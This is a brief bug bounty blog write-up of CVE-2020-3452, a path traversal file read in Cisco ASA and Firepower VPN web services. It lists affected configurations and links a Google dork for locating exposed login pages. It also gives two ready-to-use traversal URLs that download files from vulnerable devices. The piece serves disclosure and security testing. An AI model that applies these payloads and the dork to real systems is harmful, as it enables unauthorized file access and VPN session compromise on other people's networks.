$$ Bounties for Unauthenticated file read in Cisco ASA CVE-2020–3452
Hey Friends back again with a write-up, I’m bit lazy in writing Bug Bounty write-ups but here i am !!.
In July 22 2020 Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Web Services had a Path Traversal Vulnerability where any user could read files on Cisco ASA’s with SSL VPN Service. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. As an example, this could allow an attacker to impersonate another VPN user and establish a Clientless SSL VPN or AnyConnect VPN session to the device as that user.
Below are the Vulnerable configs
AnyConnect IKEv2 Remote Access (with client services)
crypto ikev2 enable <interface_name> client-services port <port #>AnyConnect SSL VPN
webvpn
enable <interface_name>Clientless SSL VPN
webvpn
enable <interface_name>AnyConnect IKEv2 Remote Access (with client services)1,2
crypto ikev2 enable <interface_name> client-services port <port #>AnyConnect SSL VPN1,2
webvpn
enable <interface_name>So how to perform an Attack on this Vulnerability ?
Lets take this as an example
Vulnerable ASA
https://1.1.1.1/+CSCOE+/logon.html?fcadbadd=1#form_title_text
Check out my Dork on Google Hacking Database you can find similar logins
Dork https://www.exploit-db.com/ghdb/6441
Vulnerable Endpoints
/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
If the Endpoint is vulnerable you will be able to view ASa files through Burp Suite or on Browser, the files will be downloaded.
I found many Top level organizations having this vulnerability and earned some good amount of money becuase it accepts as a P2.
Test your Networks for these vulnerabilities or try your luck on Bug Bounties
See you Soon!!
